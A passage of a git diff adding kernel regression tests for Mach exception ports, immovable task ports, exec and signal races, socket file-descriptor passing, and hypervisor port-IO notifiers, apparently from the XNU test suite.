+       T_EXPECT_EQ(kr, 0, "flavors should be the same");
+
+       kr = mach_port_kernel_object(mach_task_self(), mach_task_self(), &kotype, &kobject);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_kernel_object(): 0x%x", kr);
+       T_LOG("task_self kobject: 0x%x", kobject);
+
+       T_QUIET; T_EXPECT_MACH_SUCCESS(mach_port_space_info(mach_task_self(), &info_space, &table,
+           &tblcnt, &tree, &treecnt), "mach_port_space_info(): 0x%x", kr);
+
+       for (int i = 0; i < tblcnt; i++) {
+               if (table[i].iin_name == exc_port1) {
+                       exc_port1_kaddr = table[i].iin_object;
+               }
+               if (table[i].iin_name == exc_port2) {
+                       exc_port2_kaddr = table[i].iin_object;
+               }
+               if (table[i].iin_name == exc_port3) {
+                       exc_port3_kaddr = table[i].iin_object;
+               }
+       }
+
+       T_LOG("exc_port_1_kaddr: 0x%x", exc_port1_kaddr);
+       T_LOG("exc_port_2_kaddr: 0x%x", exc_port2_kaddr);
+       T_LOG("exc_port_3_kaddr: 0x%x", exc_port3_kaddr);
+
+       for (int i = 0; i < count; i++) {
+               T_LOG("ports_info[%d].iip_port_object: 0x%x", i, ports_info[i].iip_port_object);
+
+               if (ports_info[i].iip_port_object == exc_port1_kaddr) {
+                       T_EXPECT_NE(ports_info[i].iip_port_object, 0,
+                           "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object);
+                       T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject,
+                           "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object);
+                       T_EXPECT_EQ(masks[i], EXC_MASK_GUARD, "check if mask for exc_port1 is correct");
+                       found_exc_port1 = true;
+               }
+               if (ports_info[i].iip_port_object == exc_port2_kaddr) {
+                       T_EXPECT_NE(ports_info[i].iip_port_object, 0,
+                           "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object);
+                       T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject,
+                           "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object);
+                       T_EXPECT_EQ(masks[i], EXC_MASK_RPC_ALERT, "check if mask for exc_port2 is correct");
+                       found_exc_port2 = true;
+               }
+               if (ports_info[i].iip_port_object == exc_port3_kaddr) {
+                       T_EXPECT_NE(ports_info[i].iip_port_object, 0,
+                           "on debug/kernel, port object should be non-zero: 0x%x", ports_info[i].iip_port_object);
+                       T_EXPECT_EQ(ports_info[i].iip_receiver_object, kobject,
+                           "receiver object should match task self kobject: 0x%x", ports_info[i].iip_receiver_object);
+                       T_EXPECT_EQ(masks[i], EXC_MASK_RESOURCE | EXC_MASK_BREAKPOINT | EXC_MASK_SYSCALL, "check if mask for exc_port3 is correct");
+                       found_exc_port3 = true;
+               }
+       }
+
+       T_EXPECT_TRUE(found_exc_port1, "should find exc_port1");
+       T_EXPECT_TRUE(found_exc_port2, "should find exc_port2");
+       T_EXPECT_TRUE(found_exc_port3, "should find exc_port3");
+}
diff --git a/tests/exception_tests.c b/tests/exception_tests.c
new file mode 100644 (file)
index 0000000..37517e7
--- /dev/null
@@ -0,0 +1,51 @@
+#include <darwintest.h>
+#include <pthread/private.h>
+#include <sys/sysctl.h>
+#include "exc_helpers.h"
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(true));
+
+static size_t
+exc_immovable_handler(
+       mach_port_t task,
+       mach_port_t thread,
+       __unused exception_type_t type,
+       __unused mach_exception_data_t codes)
+{
+       T_EXPECT_EQ(task, mach_task_self(), "Received immovable task port");
+       T_EXPECT_EQ(thread, pthread_mach_thread_np(pthread_main_thread_np()),
+           "Received immovable thread port");
+       T_END;
+}
+
+T_DECL(exc_immovable, "Test that exceptions receive immovable ports")
+{
+       mach_port_t exc_port = create_exception_port(EXC_MASK_BAD_ACCESS);
+       uint32_t opts = 0;
+       size_t size = sizeof(opts);
+       mach_port_t mp;
+       kern_return_t kr;
+
+       T_LOG("Check if immovable control port options have been enabled\n");
+       int ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0);
+       T_EXPECT_POSIX_SUCCESS(ret, "sysctlbyname(kern.ipc_control_port_options)");
+
+       if ((opts & 0x30) == 0) {
+               T_SKIP("immovable rights aren't enabled");
+       }
+
+       kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &mp);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_special_port");
+       T_EXPECT_NE(mp, mach_task_self(), "should receive movable port");
+
+       /*
+        * do not deallocate the port we received on purpose to check
+        * that the exception will not coalesce with the movable port
+        * we have in our space now
+        */
+
+       run_exception_handler(exc_port, exc_immovable_handler);
+       *(void *volatile*)0 = 0;
+}
diff --git a/tests/exception_tests.entitlements b/tests/exception_tests.entitlements
new file mode 100644 (file)
index 0000000..bfd52f6
--- /dev/null
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>com.apple.security.get-movable-control-port</key>
+       <true/>
+</dict>
+</plist>
diff --git a/tests/exec-race-58566604.c b/tests/exec-race-58566604.c
new file mode 100644 (file)
index 0000000..939daf0
--- /dev/null
@@ -0,0 +1,171 @@
+#include <assert.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <signal.h>
+#include <unistd.h>
+#include <errno.h>
+#include <string.h>
+#include <sys/wait.h>
+
+#include <darwintest.h>
+
+// rdar://58566604
+// Exercise races of signal delivery vs exec in multi-threaded processes
+
+T_GLOBAL_META(T_META_NAMESPACE("xnu.exec"),
+    T_META_CHECK_LEAKS(false),
+    T_META_ALL_VALID_ARCHS(true));
+
+enum { KILL_ONCE, KILL_MANY, KILL_LAST } kill_mode;
+enum { EXEC_FIRST, EXEC_SECOND, EXEC_LAST } exec_mode;
+
+static int fd[2];
+
+static void
+do_exec(void)
+{
+       char echo_arg[50] = "";
+
+       snprintf(echo_arg, sizeof(echo_arg), "            Child[%d] says hello after exec", getpid());
+
+       char * new_argv[] = {
+               "/bin/echo",
+               echo_arg,
+               NULL
+       };
+
+       int ret = execv(new_argv[0], new_argv);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "execv()");
+}
+
+static void*
+thread_main(void* arg)
+{
+       T_LOG("mode: %d, %d: Child[%d] created second thread\n",
+           kill_mode, exec_mode, getpid());
+
+       if (exec_mode == EXEC_SECOND) {
+               int ret = dprintf(fd[1], "Hi!");
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()");
+               do_exec();
+       }
+
+       while (1) {
+       }
+       return NULL;
+}
+
+void
+run_test(void)
+{
+       T_LOG("mode: %d, %d: Parent[%d]: forking\n",
+           kill_mode, exec_mode, getpid());
+
+       pid_t child_pid = fork();
+
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(child_pid, "fork()");
+
+       int ret = 0;
+
+       if (child_pid == 0) {
+               pthread_t thread;
+               ret = pthread_create(&thread, NULL, thread_main, NULL);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create()");
+
+               if (exec_mode == EXEC_FIRST) {
+                       ret = dprintf(fd[1], "Hi!");
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "dprintf()");
+
+                       do_exec();
+               }
+
+               while (1) {
+               }
+       } else {
+               char buffer[4] = "";
+               ret = read(fd[0], buffer, sizeof(buffer));
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "read()");
+
+               T_LOG("mode: %d, %d: Parent[%d]: got: '%s' from execing child, trying to kill and wait\n",
+                   kill_mode, exec_mode, getpid(), buffer);
+
+               int killcount = 0, status = 0, waitedpid = 0;
+
+               switch (kill_mode) {
+               case KILL_ONCE:
+                       ret = kill(child_pid, SIGKILL);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()");
+
+                       waitedpid = waitpid(child_pid, &status, 0);
+
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()");
+
+                       killcount++;
+                       break;
+               case KILL_MANY:
+                       while (waitedpid == 0) {
+                               ret = kill(child_pid, SIGKILL);
+                               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kill()");
+
+                               waitedpid = waitpid(child_pid, &status, WNOHANG);
+                               T_QUIET; T_ASSERT_POSIX_SUCCESS(waitedpid, "waitpid()");
+
+                               killcount++;
+                       }
+                       break;
+               default:
+                       break;
+               }
+
+               T_LOG("mode: %d, %d: Parent[%d]: waitpid returned: %d, errno %d (%s), exit signal %d, after %d loops\n",
+                   kill_mode, exec_mode, getpid(), waitedpid, errno, strerror(errno), WTERMSIG(status), killcount);
+       }
+}
+
+T_DECL(exec_exit_race_once_first, "Exec-exit race, one kill, exec on first thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_ONCE;
+       exec_mode = EXEC_FIRST;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
+
+T_DECL(exec_exit_race_many_first, "Exec-exit race, many kill, exec on first thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_MANY;
+       exec_mode = EXEC_FIRST;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
+
+T_DECL(exec_exit_race_once_second, "Exec-exit race, one kill, exec on second thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_ONCE;
+       exec_mode = EXEC_SECOND;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
+
+T_DECL(exec_exit_race_many_second, "Exec-exit race, many kill, exec on second thread") {
+       int rv = pipe(fd);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pipe()");
+
+       kill_mode = KILL_MANY;
+       exec_mode = EXEC_SECOND;
+
+       for (int i = 0; i < 1000; i++) {
+               run_test();
+       }
+}
diff --git a/tests/extract_right_soft_fail.c b/tests/extract_right_soft_fail.c
new file mode 100644 (file)
index 0000000..006512a
--- /dev/null
@@ -0,0 +1,114 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+#include <sys/sysctl.h>
+#include <spawn.h>
+#include <signal.h>
+
+#define IKOT_TASK_CONTROL 2
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+static void
+test_extract_immovable_task_port(pid_t pid)
+{
+       kern_return_t kr;
+       mach_port_t tport = MACH_PORT_NULL;
+       ipc_info_space_t space_info;
+       ipc_info_name_array_t table;
+       mach_msg_type_number_t tableCount;
+       ipc_info_tree_name_array_t tree; /* unused */
+       mach_msg_type_number_t treeCount; /* unused */
+
+       mach_port_t extracted;
+       mach_msg_type_name_t right;
+
+
+       kr = task_for_pid(mach_task_self(), pid, &tport);
+       T_EXPECT_MACH_SUCCESS(kr, "task_for_pid(), tport: 0x%x", tport);
+
+       T_LOG("Target pid: %d", pid);
+
+       if (pid == getpid()) {
+               /* self extraction should succeed */
+               kr = mach_port_extract_right(mach_task_self(), mach_task_self(), MACH_MSG_TYPE_COPY_SEND, &extracted, &right);
+               T_EXPECT_MACH_SUCCESS(kr, "mach_port_extract_right() on immovable port in current space should succeed");
+       } else {
+               unsigned int kotype = 0, kobject = 0;
+               mach_port_name_t tport_name = MACH_PORT_NULL;
+               kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount);
+               T_EXPECT_MACH_SUCCESS(kr, "mach_port_space_info()");
+
+               for (int i = 0; i < tableCount; i++) {
+                       T_LOG("Searching for task port..name: 0x%x", table[i].iin_name);
+                       kr = mach_port_kernel_object(tport, table[i].iin_name, &kotype, &kobject);
+                       if (KERN_SUCCESS == kr && kotype == IKOT_TASK_CONTROL) {
+                               tport_name = table[i].iin_name;
+                               break;
+                       } else if (kr) {
+                               T_LOG("mach_port_kernel_object() failed on name 0x%x, kr: 0x%x", table[i].iin_name, kr);
+                       }
+               }
+
+               if (!tport_name) {
+                       T_FAIL("Did not find task port in child's space");
+               }
+               T_LOG("Remote tport name: 0x%x", tport_name);
+               kr = mach_port_extract_right(tport, tport_name, MACH_MSG_TYPE_COPY_SEND, &extracted, &right);
+               T_EXPECT_EQ(kr, KERN_INVALID_CAPABILITY, "mach_port_extract_right() on immovable port in child's space should fail (no crash): 0x%x", kr);
+
+               T_LOG("Still alive..");
+       }
+}
+
+T_DECL(extract_right_soft_fail, "Test mach_port_extract_right() fail on extracting child process's task port without crash",
+    T_META_CHECK_LEAKS(false))
+{
+       uint32_t opts = 0;
+       size_t size = sizeof(opts);
+       pid_t child_pid;
+       kern_return_t ret;
+       int status, fd[2];
+
+       T_LOG("Check if immovable control port has been enabled\n");
+       ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0);
+
+       if (!ret && (opts & 0x20) == 0) {
+               T_SKIP("immovable control port hard enforcement isn't enabled");
+       }
+
+       /* extracting mach_task_self() should succeed */
+       test_extract_immovable_task_port(getpid());
+
+       ret = pipe(fd);
+       T_EXPECT_NE(ret, -1, "pipe creation");
+
+
+       child_pid = fork();
+
+       if (child_pid < 0) {
+               T_FAIL("fork() failed");
+       }
+
+       if (child_pid == 0) {
+               close(fd[0]);
+               write(fd[1], "wakeup", 6);
+               close(fd[1]);
+       } else {
+               close(fd[1]);
+               char data[6];
+               read(fd[0], data, 6); /* blocks until data available */
+               close(fd[0]);
+
+               /* extracting child's immovable task port should fail without crash */
+               test_extract_immovable_task_port(child_pid);
+
+               kill(child_pid, SIGKILL);
+               wait(&status);
+       }
+}
diff --git a/tests/fd_send.c b/tests/fd_send.c
new file mode 100644 (file)
index 0000000..53aa368
--- /dev/null
@@ -0,0 +1,207 @@
+#include <darwintest.h>
+#include <darwintest_utils.h>
+#include <dispatch/dispatch.h>
+#include <mach/mach.h>
+#include <signal.h>
+#include <sys/socket.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.fd"),
+       T_META_RUN_CONCURRENTLY(true));
+
+
+#define SOCKETPAIR(pair) \
+       T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair), "socketpair")
+
+
+static errno_t
+send_fd(int sock, int fd)
+{
+       struct iovec iovec[1];
+       struct msghdr msg;
+       struct cmsghdr *cmsghdrp;
+       char buf[CMSG_SPACE(sizeof(int))];
+
+       iovec[0].iov_base = "";
+       iovec[0].iov_len = 1;
+       msg.msg_name = 0;
+       msg.msg_namelen = 0;
+       msg.msg_iov = iovec;
+       msg.msg_iovlen = 1;
+       msg.msg_control = buf;
+       msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+       cmsghdrp = CMSG_FIRSTHDR(&msg);
+       cmsghdrp->cmsg_len = CMSG_LEN(sizeof(int));
+       cmsghdrp->cmsg_level = SOL_SOCKET;
+       cmsghdrp->cmsg_type = SCM_RIGHTS;
+
+       memcpy(CMSG_DATA(cmsghdrp), &fd, sizeof(fd));
+
+       if (sendmsg(sock, &msg, 0) < 0) {
+               return errno;
+       }
+
+       return 0;
+}
+
+static errno_t
+recv_fd(int sock, int *fdp)
+{
+       u_char c;
+       struct iovec iovec[1];
+       struct msghdr msg;
+       struct cmsghdr *cmsghdrp;
+       char buf[CMSG_SPACE(sizeof(int))];
+
+       iovec[0].iov_base = &c;
+       iovec[0].iov_len = 1;
+
+       msg.msg_name = 0;
+       msg.msg_namelen = 0;
+       msg.msg_iov = iovec;
+       msg.msg_iovlen = 1;
+       msg.msg_control = buf;
+       msg.msg_controllen = CMSG_SPACE(sizeof(int));
+       msg.msg_flags = 0;
+
+       if (recvmsg(sock, &msg, 0) < 0) {
+               return errno;
+       }
+
+       cmsghdrp = CMSG_FIRSTHDR(&msg);
+       if (cmsghdrp == NULL) {
+               return ENOENT;
+       }
+
+       if (cmsghdrp->cmsg_len != CMSG_LEN(sizeof(int))) {
+               return ENOENT;
+       }
+       if (cmsghdrp->cmsg_level != SOL_SOCKET) {
+               return ENOENT;
+       }
+       if (cmsghdrp->cmsg_type != SCM_RIGHTS) {
+               return ENOENT;
+       }
+
+       memcpy(fdp, CMSG_DATA(cmsghdrp), sizeof(*fdp));
+       return 0;
+}
+
+T_DECL(send, "test for 30465592")
+{
+       int pair[2], fd, status;
+       pid_t child;
+
+       T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair),
+           "socketpair");
+
+       child = fork();
+       if (child != 0) {
+               fd = open("/dev/null", O_RDWR);
+               T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)");
+
+               T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd");
+               T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)");
+
+               T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid");
+       } else {
+               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd");
+               T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)");
+               raise(SIGKILL); /* do not confuse the test system */
+       }
+}
+
+T_DECL(send_kill, "test for 30465592")
+{
+       int pair[2], fd, status;
+       pid_t child;
+
+       T_QUIET; SOCKETPAIR(pair);
+
+       child = fork();
+       if (child != 0) {
+               fd = open("/dev/null", O_RDWR);
+               T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)");
+
+               T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd");
+               T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)");
+
+               T_EXPECT_POSIX_SUCCESS(kill(child, SIGKILL), "kill(child)");
+
+               T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid");
+       } else {
+               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd");
+               T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)");
+               raise(SIGKILL); /* do not confuse the test system */
+       }
+}
+
+T_DECL(send_sock, "test for 30465592")
+{
+       int pair[2], fd, status;
+       pid_t child;
+
+       T_QUIET; SOCKETPAIR(pair);
+
+       child = fork();
+       if (child != 0) {
+               int sock[2];
+
+               T_QUIET; SOCKETPAIR(sock);
+
+               T_ASSERT_EQ(send_fd(pair[0], sock[0]), 0, "send_fd");
+               T_ASSERT_POSIX_SUCCESS(close(sock[0]), "close(sock[0])");
+               T_ASSERT_POSIX_SUCCESS(close(sock[1]), "close(sock[1])");
+
+               T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid");
+       } else {
+               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd");
+               T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)");
+               raise(SIGKILL); /* do not confuse the test system */
+       }
+}
+
+T_DECL(send_stress, "test for 67133384")
+{
+       int fd;
+
+       fd = open("/dev/null", O_RDWR);
+       T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)");
+
+       dispatch_apply(10, NULL, ^(size_t worker) {
+               dispatch_queue_t q = dispatch_queue_create("receiver", NULL);
+               dispatch_group_t g = dispatch_group_create();
+               int pairbuf[2], *pair = pairbuf;
+               int n = 1000;
+
+               SOCKETPAIR(pair);
+
+               dispatch_group_async(g, q, ^{
+                       int tmp;
+
+                       for (int i = 0; i < n; i++) {
+                               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &tmp), 0, "recv_fd");
+                               T_QUIET; T_ASSERT_NE(tmp, -1, "received a proper fd");
+                               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)");
+                       }
+               });
+               dispatch_release(q);
+
+               for (int i = 0; i < n; i++) {
+                       int tmp = dup(fd);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(tmp, "dup");
+                       T_QUIET; T_ASSERT_EQ(send_fd(pair[0], tmp), 0, "send_fd");
+                       T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)");
+               }
+               dispatch_group_wait(g, DISPATCH_TIME_FOREVER);
+
+               T_PASS("sent and received %d fds in worker %zd", n, worker);
+
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[0]), "close(pair[0])");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[1]), "close(pair[1])");
+       });
+}
index 12f09d0e85881a101ecfce7ebc4cc51e3a126f78..aaf0610b9d23f3efcefd93fa8936c138ffe504b4 100644 (file)
@@ -54,6 +54,8 @@ static volatile bool mach_exc_caught = false;
 #ifdef __arm64__
 static size_t
 exc_arithmetic_handler(
+       __unused mach_port_t task,
+       __unused mach_port_t thread,
        exception_type_t type,
        mach_exception_data_t codes_64)
 {
diff --git a/tests/hv_private.entitlements b/tests/hv_private.entitlements
deleted file mode 100644 (file)
index e6cea65..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.private.hypervisor</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/hv_public.entitlements b/tests/hv_public.entitlements
deleted file mode 100644 (file)
index c2ef1a3..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.security.hypervisor</key>
-       <true/>
-</dict>
-</plist>
index 0aebb6bc1b4a07c952d2bc9531e319f973a4c1f2..65e885e43a314c7b7b741a43fd6063c6570b4e55 100644 (file)
@@ -569,8 +569,11 @@ vm_setup()
 static void
 vm_cleanup()
 {
-    T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm");
+       T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm");
        free_page_cache();
+
+       pml4 = NULL;
+       pml4_gpa = 0;
 }
 
 static pthread_cond_t ready_cond = PTHREAD_COND_INITIALIZER;
@@ -1246,3 +1249,392 @@ T_DECL(radar63641279, "rdar://63641279 (Evaluate \"no SMT\" scheduling option/si
 
        vm_cleanup();
 }
+
+// Get the number of messages waiting for the specified port
+static int
+get_count(mach_port_t port)
+{
+       int count;
+
+       count = 0;
+       while (true) {
+               hv_ion_message_t msg = {
+                       .header.msgh_size = sizeof (msg),
+                       .header.msgh_local_port = port,
+               };
+
+               kern_return_t ret = mach_msg(&msg.header, MACH_RCV_MSG | MACH_RCV_TIMEOUT,
+                   0, sizeof (msg), port, 0, MACH_PORT_NULL);
+
+               if (ret != MACH_MSG_SUCCESS) {
+                       break;
+               }
+
+               T_QUIET; T_ASSERT_TRUE(msg.addr == 0xab || msg.addr == 0xcd || msg.addr == 0xef,
+                   "address is 0xab, 0xcd or 0xef");
+               T_QUIET; T_ASSERT_EQ(msg.value, 0xaaULL, "value written is 0xaa");
+               T_QUIET; T_ASSERT_TRUE(msg.size == 1 || msg.size == 4, "size is 1 or 4");
+
+               count++;
+       }
+
+       return count;
+}
+
+static void *
+pio_monitor(void *arg, hv_vcpuid_t vcpu)
+{
+
+       size_t guest_pages_size = round_page((uintptr_t)&hvtest_end - (uintptr_t)&hvtest_begin);
+       const size_t mem_size = 1 * 1024 * 1024;
+       uint8_t *guest_pages_shadow = valloc(mem_size);
+       int handle_io_count = 0;
+       uint64_t exit_reason = 0;
+
+       setup_real_mode(vcpu);
+
+       bzero(guest_pages_shadow, mem_size);
+       memcpy(guest_pages_shadow+0x1000, &hvtest_begin, guest_pages_size);
+
+       T_ASSERT_EQ(hv_vm_map(guest_pages_shadow, 0x0, mem_size, HV_MEMORY_READ | HV_MEMORY_EXEC), HV_SUCCESS,
+           "map guest memory");
+
+       while (true) {
+           T_QUIET; T_ASSERT_EQ(hv_vcpu_run_until(vcpu, ~(uint64_t)0), HV_SUCCESS, "run VCPU");
+               T_QUIET; T_ASSERT_EQ(hv_vcpu_run_until(vcpu, ~(uint64_t)0), HV_SUCCESS, "run VCPU");
+               exit_reason = get_vmcs(vcpu, VMCS_RO_EXIT_REASON);
+               if (exit_reason == VMX_REASON_VMCALL) {
+                       break;
+               }
+
+               if (exit_reason == VMX_REASON_IRQ) {
+                       continue;
+               }
+
+               T_QUIET; T_ASSERT_EQ(exit_reason, (uint64_t)VMX_REASON_IO, "exit reason is IO");
+
+               union {
+                       struct {
+                               uint64_t io_size:3;
+                               uint64_t io_dirn:1;
+                               uint64_t io_string:1;
+                               uint64_t io_rep:1;
+                               uint64_t io_encoding:1;
+                               uint64_t __io_resvd0:9;
+                               uint64_t io_port:16;
+                               uint64_t __io_resvd1:32;
+                       } io;
+                       uint64_t reg64;
+               } info = {
+                       .reg64 = get_vmcs(vcpu, VMCS_RO_EXIT_QUALIFIC),
+               };
+
+               T_QUIET; T_ASSERT_EQ(info.io.io_port, 0xefULL, "exit is a port IO on 0xef");
+
+               handle_io_count++;
+
+               set_vmcs(vcpu, VMCS_GUEST_RIP, get_reg(vcpu, HV_X86_RIP) + get_vmcs(vcpu, VMCS_RO_VMEXIT_INSTR_LEN));
+       }
+
+       free(guest_pages_shadow);
+
+       *((int *)arg) = handle_io_count;
+
+       return NULL;
+}
+
+T_DECL(pio_notifier_arguments, "test adding and removing port IO notifiers")
+{
+       mach_port_t notify_port = MACH_PORT_NULL;
+       kern_return_t kret = KERN_FAILURE;
+       hv_return_t hret = HV_ERROR;
+
+       T_SETUPBEGIN;
+
+       /* Setup notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* Setup VM */
+       vm_setup();
+
+       T_SETUPEND;
+
+       /* Add with bad size. */
+       hret = hv_vm_add_pio_notifier(0xab, 7, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad size");
+
+       /* Add with bad data. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad data");
+
+       /* Add with bad mach port. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, MACH_PORT_NULL, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad port");
+
+       /* Add with bad flags. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, 0xffff);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad flags");
+
+       /* Remove when none are installed. */
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "removing a non-existent notifier");
+
+       /* Add duplicate. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier");
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding duplicate notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier");
+
+       /* Add then remove. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier");
+
+       /* Add two, remove in reverse order. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 1st notifier");
+       hret = hv_vm_add_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 2nd notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing 2nd notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier in reverse order");
+
+       /* Add with ANY_SIZE and remove. */
+       hret = hv_vm_add_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_SIZE");
+       hret = hv_vm_remove_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_SIZE");
+
